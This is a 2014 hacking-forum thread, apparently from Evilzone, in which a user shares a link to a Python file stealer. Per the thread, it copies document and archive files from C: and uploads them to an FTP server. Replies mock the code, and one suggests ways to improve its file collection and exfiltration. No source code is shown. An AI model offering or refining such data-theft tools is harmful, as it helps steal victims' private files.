Author Topic: [Python] [Source Code] Arne Stealer  (Read 1167 times)

0 Members and 1 Guest are viewing this topic.

Offline Kara Ayaz

  • NULL
  • Posts: 4
  • Cookies: -5
    • View Profile
[Python] [Source Code] Arne Stealer
« on: December 31, 2014, 05:50:16 pm »
Hi.
C: in "log, doc, docx, rar, zip, psd" folder scans files as the "Ayaz" copying. Then installing them to the server using the ftp information in virüs.py





















Github: https://github.com/ayazhan/Staller


I did not bother to all file extensions, can develop friends who want to.

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [Python] [Source Code] Arne Stealer
« Reply #1 on: December 31, 2014, 06:34:55 pm »
Thanks for the code, but I have no idea what you said in the post. Also a stealer in Python? don't think so, maybe good as a PoC but not when you need to deploy it... I suppose it's ok if you run it from a flash drive, then you can use Py2exe or something.

Offline Kara Ayaz

  • NULL
  • Posts: 4
  • Cookies: -5
    • View Profile
Re: [Python] [Source Code] Arne Stealer
« Reply #2 on: December 31, 2014, 06:53:52 pm »

All types will work in that environment.
The required information can be made into exe file after entering. virus.py FTP information should be entered into :)

Offline d4rkcat

  • Knight
  • **
  • Posts: 287
  • Cookies: 115
  • He who controls the past controls the future. He who controls the present controls the past.
    • View Profile
    • Scripts
Re: [Python] [Source Code] Arne Stealer
« Reply #3 on: December 31, 2014, 07:29:35 pm »


Seriously though, It really hurt my head to try to read your interpretation of English.
And yes, I know English is not your first language, it still doesn't excuse that crazy mess.
I still have no idea about what this does, stealer?
anyway thanks for posting, I will consider it a challenge to decipher this.
Jabber (OTR required): thed4rkcat@einfachjabber.de    Email (PGP required): thed4rkcat@yandex.com    PGP Key: here and here     Blog

<sofldan> not asking for anyone to hold my hand uber space shuttle door gunner guy.


Offline Kara Ayaz

  • NULL
  • Posts: 4
  • Cookies: -5
    • View Profile
Re: [Python] [Source Code] Arne Stealer
« Reply #4 on: December 31, 2014, 07:50:52 pm »
Language is not important; codes is important;)

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [Python] [Source Code] Arne Stealer
« Reply #5 on: December 31, 2014, 08:24:33 pm »
Language is not important; codes is important;)
It is, and yours is kinda messed up. But good work nonetheless :P

Offline 0E 800

  • Not a VIP
  • VIP
  • Baron
  • *
  • Posts: 895
  • Cookies: 131
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
    • View Profile
Re: [Python] [Source Code] Arne Stealer
« Reply #6 on: December 31, 2014, 09:17:55 pm »
Trying to figure out what this does.

Scans for document type files for a user named Ayaz? Then ftps them to your site?

The invariable mark of wisdom is to see the miraculous in the common.

Offline kenjoe41

  • Symphorophiliac Programmer
  • Administrator
  • Baron
  • *
  • Posts: 990
  • Cookies: 224
    • View Profile
Re: [Python] [Source Code] Arne Stealer
« Reply #7 on: January 02, 2015, 11:45:05 am »
Trying to figure out what this does.

Scans for document type files for a user named Ayaz? Then ftps them to your site?


Well that is basically it. You solved the installing to ftp stuff mystery.
But first, this is not a virus.

Looks like we are only gonna search i the C:\ directory, there might be better goodies in other partitions, ya know.
The extensions are hard coded, i mean we could have default ones but a way ti specify new ones could be better. A way to transverse the different drives on windows would be good.
A config file might solve alot of the troubles you are facing.
Why not use a temporary dir to copy files to then exfiltrate them? Because your script ain't deleting the exfiltration dir created.

Imports: Did you really need to import os and os.path too. why in the hell did you need getpass for, i don't see you using it. Why is ftplib and threading there. You never do anything with them. Do you even know how to call a custom module?

And why did you have to write a new script somewhere else, you could have executed the code from your virus.py script or just placed them in you main script, the logic of this Software engineering is illogical.

Man, you sure are listening to the wrong people, hanging around the wrong forums and copying and pasting code the wrong way.
There is alot to correct with you code that my heart bleeds at how shitty it still is. I would care less if you used google translate the wrong way, but posting shitty code is .... You should learn some basic english and we can chat alot here about how to improve you code.
If you can't explain it to a 6 year old, you don't understand it yourself.
http://upload.alpha.evilzone.org/index.php?page=img&img=GwkGGneGR7Pl222zVGmNTjerkhkYNGtBuiYXkpyNv4ScOAWQu0-Y8[<NgGw/hsq]>EvbQrOrousk[/img]